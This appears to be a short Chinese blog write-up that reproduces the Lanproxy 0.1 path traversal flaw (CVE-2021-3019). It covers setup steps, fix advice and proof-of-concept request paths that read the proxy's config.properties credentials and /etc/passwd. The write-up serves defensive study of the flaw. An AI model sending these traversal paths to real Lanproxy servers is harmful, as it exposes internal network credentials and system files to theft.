漏洞概述
Lanproxy是一个将局域网个人电脑、服务器代理到公网的内网穿透工具,支持tcp流量转发,可支持任何tcp上层协议(访问内网网站、本地支付接口调试、ssh访问、远程桌面等等)本次Lanproxy 路径遍历漏洞 (CVE-2021-3019)通过…/绕过读取任意文件。该漏洞允许目录遍历读取/…/conf/config.properties来获取到内部网连接的凭据。
影响版本:lanproxy 0.1
环境搭建
https://file.nioee.com/d/2e81550ebdbd416c933f/
下载解压安装
直接启动服务
cd bin
chmod +x startup.sh
./startup.sh
访问127.0.0.1:8090(如果在虚拟机外访问 虚拟机ip:8090)
开始复现
POC
/…/conf/config.properties
获取passwd
/…/…/…/…/…/…/…/…/…/etc/passwd
已经成功读取
建议修复
升级安全版本
建议禁止将lanproxy管理面板对外部开放
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
